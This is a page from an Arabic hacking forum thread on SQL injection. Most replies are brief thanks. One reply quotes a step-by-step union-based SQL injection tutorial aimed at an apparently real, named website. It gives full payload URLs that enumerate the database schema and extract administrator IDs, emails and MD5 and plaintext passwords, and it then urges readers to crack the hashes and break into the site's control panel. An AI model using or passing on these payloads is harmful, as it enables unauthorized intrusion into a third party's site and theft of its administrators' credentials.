التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-24-2013, 12:44 PM   رقم المشاركة : 76 (permalink)
معلومات العضو
 
الصورة الرمزية haitemdz
 

 

 
إحصائية العضو







haitemdz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
haitemdz is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


مشكوور

   

رد مع اقتباس
قديم 07-25-2013, 02:09 PM   رقم المشاركة : 77 (permalink)
معلومات العضو
 
الصورة الرمزية Omar-H4ck3r
 

 

 
إحصائية العضو







Omar-H4ck3r غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Omar-H4ck3r is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


Thanxx

   

رد مع اقتباس
قديم 08-04-2013, 03:36 AM   رقم المشاركة : 78 (permalink)
معلومات العضو
 
الصورة الرمزية alinaseer
 

 

 
إحصائية العضو







alinaseer غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
alinaseer is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


مشاء الله شرح روعة

   

رد مع اقتباس
قديم 08-08-2013, 08:49 PM   رقم المشاركة : 79 (permalink)
معلومات العضو
 
الصورة الرمزية broso
 

 

 
إحصائية العضو






broso غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
broso is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


شرح رائع

   

رد مع اقتباس
قديم 08-14-2013, 04:03 PM   رقم المشاركة : 80 (permalink)
معلومات العضو
 
الصورة الرمزية Getsuga
 

 

 
إحصائية العضو






Getsuga غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Getsuga is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


merciiiiii

   

رد مع اقتباس
قديم 08-23-2013, 04:56 PM   رقم المشاركة : 81 (permalink)
معلومات العضو
 
الصورة الرمزية CODLegend
 

 

 
إحصائية العضو






CODLegend غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
CODLegend is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


شكرا أخي الكريم على الموضوع

   

رد مع اقتباس
قديم 08-24-2013, 12:36 AM   رقم المشاركة : 82 (permalink)
معلومات العضو
 
الصورة الرمزية ahmad156
 

 

 
إحصائية العضو






ahmad156 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ahmad156 is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


شكرا

   

رد مع اقتباس
قديم 08-29-2013, 02:16 PM   رقم المشاركة : 83 (permalink)
معلومات العضو
 
إحصائية العضو







electrone1993 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
electrone1993 is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


thanks; that was important for us

   

رد مع اقتباس
قديم 09-11-2013, 11:59 PM   رقم المشاركة : 84 (permalink)
معلومات العضو
 
الصورة الرمزية D7OMI
 

 

 
إحصائية العضو






D7OMI غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
D7OMI is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


شكراً لك ي غالي ,

   

رد مع اقتباس
قديم 09-23-2013, 09:53 PM   رقم المشاركة : 85 (permalink)
معلومات العضو
 
الصورة الرمزية Soli0022
 

 

 
إحصائية العضو







Soli0022 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Soli0022 is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


شكرا اخي الكريم

   

رد مع اقتباس
قديم 10-10-2013, 08:11 PM   رقم المشاركة : 86 (permalink)
معلومات العضو
 
الصورة الرمزية ZiAD SAiD
 

 

 
إحصائية العضو







ZiAD SAiD غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ZiAD SAiD is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


مجهود رائع

   

رد مع اقتباس
قديم 10-23-2013, 09:12 PM   رقم المشاركة : 87 (permalink)
معلومات العضو
 
الصورة الرمزية onelove55
 

 

 
إحصائية العضو







onelove55 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
onelove55 is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


thank you

   

رد مع اقتباس
قديم 11-08-2013, 05:49 PM   رقم المشاركة : 88 (permalink)
معلومات العضو
 
الصورة الرمزية omar2
 

 

 
إحصائية العضو







omar2 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
omar2 is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة KaLa$nikoV
عنا موقع مصاب




نستخدم الامر
order by
لمعرفه عدد الاعمده المصابه

نبلش من 1
ونزود لحتى يختفي معانا الخطأ

كود PHP:
order by 1--
 
order by 5--
 
order by 10--
 
order by 15-- 
لاحظ اشاره الناقص في اخر الرابط -- يمكن استبدالها في بعض المواقع بالاشاره */
اي هكذا
كود PHP:
order by 1/* 
يا نورع العين نرجع لمكانا


order by 15--

لاحط هنا ظهر الخطأ
النتيجه تجاوزنا عدد الاعمده المحدد
الحل نبدأ بتقليل عدد الاعمده الى ان يعود الوضع الي ما كان عليه
order by 14
لاحظ الان الموقع تمام
ما فيه ايا خطأ
اذا عدد الاعمده تمام
نضيف الامر التالي
مع الاعمده

union select
ونضيف قبل الرقم علامه الناقص

يصير الرابط هيك

كود PHP:
 
http
://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 
انتبه للناقص

الان لنعرف اصدار القاعده
نكتب
كود PHP:
 
version
() 
وهذه بعض الاوامر


database()
version()
user()

not end



الموضعوع لم ينتهي بعد


الان نضيف التالي للحقنه



كود PHP:
concat(table_name,0x3a,column_name,0x3a,table_schema
و

كود PHP:
 
+from+information_schema.columns-- 
فتصبح

كود PHP:
 
http
://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns-- 
الان نضيف الامر التالي
كود PHP:
where+column_name+LIKE+CHAR(371129711537
كود PHP:
 
http
://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- 
طيب يا حص طلع لي نتائج كثيره هذا الموقع بدو شغلة كيف

طيب الخبره رح تعلمك شو تختار


الان عنا مفترق مثلث ماشاء الله

شوف اخي
اطلع ع النتائج زي الصاروخ
بتلقى الجداول المهمه هي
الادمن
اليوزر
والممبر
بس احنا بدنا نخترق الادمن
وهو المتوقع هدفنا يلا نصيده




زي ما انتو شايفين عنا خيارين
بتهيالي الاول هو الي مطلوب

خلينا نشتغل عليه



بلزمنا الان الموقع الرائع وهو

كود PHP:
 
http
://www.waraxe.us/sql-char-encoder.html 
اوك يا غالي شو بدنا بهذا الموقع
تشفير اسم الجدول وعنا اسم الجدول هو

نوع التشفير هو
كود PHP:
 
  MySql hex
-encoded string 
يصير الان بحث من اسم هدا الجدول وذلك من خلال الامر

where+table_name=



يعني هيك

كود PHP:
where+table_name=0x53757276657941646d696e73 
الاستغلال


كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+table_name=0x53757276657941646d696e73-- 
ما شاء الله طلع لنا خيارات كثيره

بهمني انا منها


الان خلينا نجمع الاستغلال


اسم الجدول


السجما
SURVEYS

اسم العمود هو باقي الاسماء بالوسط
ورح نجمعها كلها مع بعض بالامر

concat

وبتصير هيك

concat(name,0x3a,pass)


كود PHP:
;admin_id;admin_fname;admin_lname;admin_md5_password;admin_password ;admin_email;admin_perm
[php]

نجمعهم بالامر

بصيرو

كود PHP:

concat
(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,ox3a,admin_perm
نركبه بالحقنه


كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,0x3a,admin_perm),7,8,9,10,11,12,13,14+from+SURVEYS.SurveyAdmins-- 
بقى تشوف الباس مشفر فكه من موقع هاش كلر وشوف مسار لوحه التحكم واخترق







استفين ع التاخر هي الدرس بالفيديو .....



   

رد مع اقتباس
قديم 12-04-2013, 01:27 PM   رقم المشاركة : 89 (permalink)
معلومات العضو
 
الصورة الرمزية alluhaiby
 

 

 
إحصائية العضو






alluhaiby غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
alluhaiby is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


جزاك الله خيرا

   

رد مع اقتباس
قديم 12-30-2013, 05:57 AM   رقم المشاركة : 90 (permalink)
معلومات العضو
 
الصورة الرمزية mojaweb0
 

 

 
إحصائية العضو







mojaweb0 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mojaweb0 is on a distinguished road

افتراضي رد: ترتيب الخطوات في حقن قواعد البيانات SQL Injection


لي المشاهدة

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
البيانات, الشرح, injection, شرح, شكر, شكرا, sql, sql injection


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ترتيب الخطوات للبلايد سكول KaLa$nikoV SQL قواعد البيانات 40 03-24-2018 11:45 PM
جميع ادوات حقن قواعد البيانات -Sql injection- {قأبل للتحديث} Master vbspiders SQL قواعد البيانات 280 08-24-2015 04:10 AM
√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection-- Master vbspiders SQL قواعد البيانات 26 12-01-2010 03:19 AM


الساعة الآن 03:45 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0